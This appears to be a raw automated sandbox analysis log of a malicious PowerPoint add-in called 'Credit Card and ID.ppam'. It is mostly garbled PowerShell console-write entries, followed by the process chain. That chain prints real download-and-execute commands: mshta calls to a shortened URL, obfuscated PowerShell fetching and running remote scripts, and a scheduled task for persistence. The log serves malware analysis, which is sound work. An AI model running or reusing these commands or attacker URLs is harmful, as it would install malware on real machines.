Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v.....O......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....hP................_.............}..v.....P......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....V......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....V................_.............}..v....@W......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....^......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....^................_.............}..v....@_......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v....`c......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k.....d................_.............}..v.....d......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v.....i......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k.....j................_.............}..v.....k......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;....... .........*k....p_S..............._.............}..v.....n......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....Xo................_.............}..v.....o......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....O.................*k....p_S..............._.............}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....O.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.................*k....p_S..............._.............}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....@.......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k......................_.............}..v....x.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....P................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....P................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....h.......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.... ................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....0.......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....h.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v............0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....(.......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....(.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....0.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#....... .........*k....p_S..............._.............}..v............0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....x................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v....`82.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k.....92..............._.............}..v.....92.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v....`@2.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k.....A2..............._.............}..v.....A2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v.....F2.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k.....G2..............._.............}..v....(H2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....@L2.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k.....L2..............._.............}..v....xM2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....p_S..............._.............}..v.....R2.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....PS2..............._.............}..v.....S2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v.....Z2.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....P[2..............._.............}..v.....[2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v....._2.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k.....`2..............._.............}..v....(a2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k....p_S..............._.............}..v....hf2.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k.... g2..............._.............}..v.....g2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....0k2.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....k2..............._.............}..v....hl2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......>.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......>..............._.............}..v....(.>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......>.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......>..............._.............}..v....(.>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......>.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8.>..............._.............}..v......>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v......>.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......>..............._.............}..v......>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....(.>.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......>..............._.............}..v....`.>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....(.>.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......>..............._.............}..v....`.>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v......>.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8.>..............._.............}..v......>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......>.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......>..............._.............}..v....0.>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v......>.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....x.>..............._.............}..v......>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......J.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8.J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......J.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8.J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v......J.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................BO.....#....................... ................._...............................N..............\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....`.J.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k......J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v......K.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p.K..............._.............}..v......K.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v......K.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p.K..............._.............}..v......K.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v......K.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k......K..............._.............}..v....H.K.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v......K.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....@.K..............._.............}..v......K.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... .........*k....p_S..............._.............}..v....P.K.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k......K..............._.............}..v......K.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....?W.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....?W..............._.............}..v....H@W.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....GW.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....GW..............._.............}..v....HHW.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....MW.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....XNW..............._.............}..v.....NW.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v.....RW.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....SW..............._.............}..v....(TW.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....HYW.....0.......................Z....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\Credit Card and ID.ppam"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {99CBF033-5891-4579-A9C8-09ABEC64739D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE "https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ((gp HKCU:\Software).cookerr)|IEX
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHTa.exe" "http://www.starinxxxgkular.duckdns.org/s1/30.txt
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHTa.exe" "http://www.starinxxxgkular.duckdns.org/s1/30.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB); Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE "https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html" Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Credit Card and ID.LNK Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDCA8.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winPPAM@20/25@13/8
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbrogr source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbiles source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbLE=C source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
